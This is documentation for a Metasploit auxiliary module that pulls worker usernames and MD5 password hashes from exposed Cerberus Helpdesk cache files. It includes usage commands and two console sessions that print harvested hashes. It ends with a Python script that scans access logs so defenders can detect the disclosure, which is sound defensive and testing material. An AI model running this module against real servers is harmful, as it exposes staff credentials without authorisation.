documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md
This module opens a devblocks_cache---ch_workers or zend_cache---ch_workers file, which contains a
data structure with username and password hash (MD5) credentials. The contents look similar to JSON, but they are not JSON.
This module has been verified against the following Cerberus Helpdesk versions:
However, it may also work on versions up to, but not including, version 6.7.
Version 5.4.4 is available on exploit-db.com.
use auxiliary/gather/cerberus_helpdesk_hash_disclosure
set rhosts [rhosts]
run
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[-] Invalid response received for 1.1.1.1 for /storage/tmp/devblocks_cache---ch_workers
[+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
[+] Found: example:112302c209fe8d73f502c132a3da2b1c
[+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
Cerberus Helpdesk User Credentials
==================================
Username  Password Hash
--------  -------------
admin     aaa34a6111abf0bd1b1c4d7cd7ebb37b
example   112302c209fe8d73f502c132a3da2b1c
foobar    0d108d09e5bbe40aade3de5c81e9e9c7
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
rhosts => 192.168.2.45
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
targeturi => /cerb5/
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
verbose => true
msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
[*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
[+] Found: [email protected]:37b51d194a7513e45b56f6524f2d51f2
[+] Found: [email protected]:acbd18db4cc2f85cedef654fccc4a4d8
[+] Found: [email protected]:18126e7bd3f84b3f3e4df094def5b7de
Cerberus Helpdesk User Credentials
==================================
Username           Password Hash
--------           -------------
[email protected]  37b51d194a7513e45b56f6524f2d51f2
[email protected]  acbd18db4cc2f85cedef654fccc4a4d8
[email protected]  18126e7bd3f84b3f3e4df094def5b7de
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
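For defenders, the requests shown in the scenarios above leave a recognisable trace in web server access logs. The following is an added example, not part of the module or its documentation: it scans log lines for requests to the two cache files and marks those that were actually served. It assumes the Apache/nginx "combined" log format and that the zend_cache file sits in the same storage/tmp/ directory as the devblocks_cache path shown above; the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# File names come from the module description; the storage/tmp/ prefix comes
# from the module output (assumed to apply to the zend_cache file as well).
CACHE_RE = re.compile(r"/storage/tmp/(?:devblocks|zend)_cache---ch_workers$")

# Apache/nginx "combined" access-log layout (assumed log format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_cache_requests(lines):
    """Return one dict per request for a ch_workers cache file."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and decode %xx escapes before matching.
        path = unquote(urlsplit(m["target"]).path)
        if not CACHE_RE.search(path):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append({
            "ip": m["ip"], "time": m["ts"], "path": path, "status": status,
            # A 200 with a body means the hash file was served to the client.
            "disclosed": status == 200 and size > 0,
        })
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2016:13:55:36 +0000] "GET /cerb5/storage/tmp/devblocks_cache---ch_workers HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [10/Oct/2016:13:55:37 +0000] "GET /cerb5/storage/tmp/zend_cache---ch_workers HTTP/1.1" 200 1843 "-" "-"',
    '203.0.113.9 - - [10/Oct/2016:14:02:11 +0000] "GET /cerb5/index.php/login HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [10/Oct/2016:14:03:00 +0000] "GET /storage/tmp/devblocks_cache%2D%2D%2Dch_workers?x=1 HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_cache_requests(SAMPLE_LOG):
        verdict = "DISCLOSED" if hit["disclosed"] else "probe"
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {verdict} {hit["path"]}')
```

A hit with `disclosed` set means the worker hashes in that file were returned to the client, so those passwords should be rotated and web access to the storage directory denied.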